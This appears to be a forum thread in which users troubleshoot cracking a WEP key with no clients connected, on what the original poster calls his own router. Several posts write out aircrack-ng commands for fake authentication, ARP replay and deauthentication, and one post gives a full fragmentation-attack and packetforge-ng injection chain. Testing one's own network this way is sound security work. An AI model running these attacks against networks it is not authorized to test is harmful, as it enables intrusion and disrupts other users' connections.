Results 1 to 6 of 6

Thread: WEP cracking no client

  1. #1
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    3

    Default WEP cracking no client

    So I am trying to crack my own WEP key without any clients connected. I have my router up and set up. The problem is that I don't get any arp when I am listening for ARPs. How can I generate traffic? I have read all around the forum and I still don't get an answer whether this can be done. Some people say yes other no, other that you need two laptops (which I have access to if needed). Anyways, this is the commands that I use. The card can inject traffic no problem.
    - airodump-ng -w ivs -c 6 ath1
    - aireplay-ng -1 30 -e essid -b bssid -h myfakemac ath1 (fake auth because no clients)
    - aireplay-ng -3 -e essid -b bssid -h myfakemac ath1 (listening for arps)
    Until this point everything ok. I Know that fakeauth does not generate traffic.
    Some people seem to think that following is to perform the deauth attac to generate traffic, however this doesn't seem to work. At least not for me. So this is what I do next.
    - aireplay-ng -0 15 -b bssid -c myfakemac ath1 (when I do this attack I start getting deauth packets of course, but no traffic or arp is generated)
    And i Wait and Wait and Wait and wait!!!. Airodump seem to grab Data packets, but aireplay doens't get any ARPs. Any comments. AM i doing something wrong? Thanks for the reply everybody.

  2. #2
    Junior Member
    Join Date
    Feb 2006
    Posts
    75

    Default

    Quote Originally Posted by hol64 View Post
    So I am trying to crack my own WEP key without any clients connected. I have my router up and set up. The problem is that I don't get any arp when I am listening for ARPs. How can I generate traffic? I have read all around the forum and I still don't get an answer whether this can be done. Some people say yes other no, other that you need two laptops (which I have access to if needed). Anyways, this is the commands that I use. The card can inject traffic no problem.
    - airodump-ng -w ivs -c 6 ath1
    - aireplay-ng -1 30 -e essid -b bssid -h myfakemac ath1 (fake auth because no clients)
    - aireplay-ng -3 -e essid -b bssid -h myfakemac ath1 (listening for arps)
    Until this point everything ok. I Know that fakeauth does not generate traffic.
    Some people seem to think that following is to perform the deauth attac to generate traffic, however this doesn't seem to work. At least not for me. So this is what I do next.
    - aireplay-ng -0 15 -b bssid -c myfakemac ath1 (when I do this attack I start getting deauth packets of course, but no traffic or arp is generated)
    And i Wait and Wait and Wait and wait!!!. Airodump seem to grab Data packets, but aireplay doens't get any ARPs. Any comments. AM i doing something wrong? Thanks for the reply everybody.

    It's been along time since I've done any WEP cracking, but something I did try and I can't clearly remember if it was successful, but I think it was. I had 2 lap-tops but you can probably do it with 1 lap-top with 2 wifi devices.

    The second lap-top try connecting to the AP and enter in any random wep key just to generate arp request (or at least try to) just make sure you have the correct mac of the second lap-top or second wifi device and use that mac in aireplay to inject traffic, deauth and fakeauth.


    You using BT2 Final or older version? Hope this helps, post back progress

  3. #3
    Junior Member
    Join Date
    Feb 2007
    Posts
    73

    Default

    Another thing you may want to try is a Fragmented attack via aireplay. It's a new feature added to aircrack-ng 0.7 suite. Very nice feature I may add. This will create a xor file that can be used with packetforge.

    Try something like this after using FakeAuth of course:

    aireplay-ng -5 -b <APMAC> -h <YOURMAC> <iface>

    This will create the xor file for next step.

    packetforge-ng -0 -a <APMAC> -h <YOURMAC> -k 255.255.255.255 -l 255.255.255.255 -y <file.xor> -w arp-request

    This creates an ARP request to be used with aireplay:

    aireplay-ng -2 -r arp-request <iface>

    Works like a charm for me. Actually I think it actually works faster then having to wait for an ARP packet. Hope this helps!

  4. #4
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    3

    Default

    Thanks for your reply. I had gone to aircrach-ng webpage and their updated documentation. They had the fragmentation attack. Which worked really well.

  5. #5
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    2

    Default

    Hi at all,
    I’m trying use Fragmented attack but I’ll remain in Read packet status ( >10.000 packets reads).
    Previously i do follow steps:
    airmon-ng start wifi0 (channel)
    ifconfig ath0 up
    iwconfig ath0 mode Monitor channel (number of channel)
    aireplay-ng -l 0 -e (ESSID) -a (ap mac) -h (my mac) ath0
    (association work fine)
    aireplay-ng -5 -b (ap mac) -h (my mac) ath0
    (wait...wait...wait........)
    Why ?


    Thank for help

  6. #6

    Default

    well, thats better than my problem, i create TONS of fast traffic, but it all doesnt mean anything, it's all garbage. i run aircrack and see what key its attempting, and its no where near my key. i cant break my routers key if i set it to be 64(40) bit but 128(104) no way, even with 1.5Million IVs.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •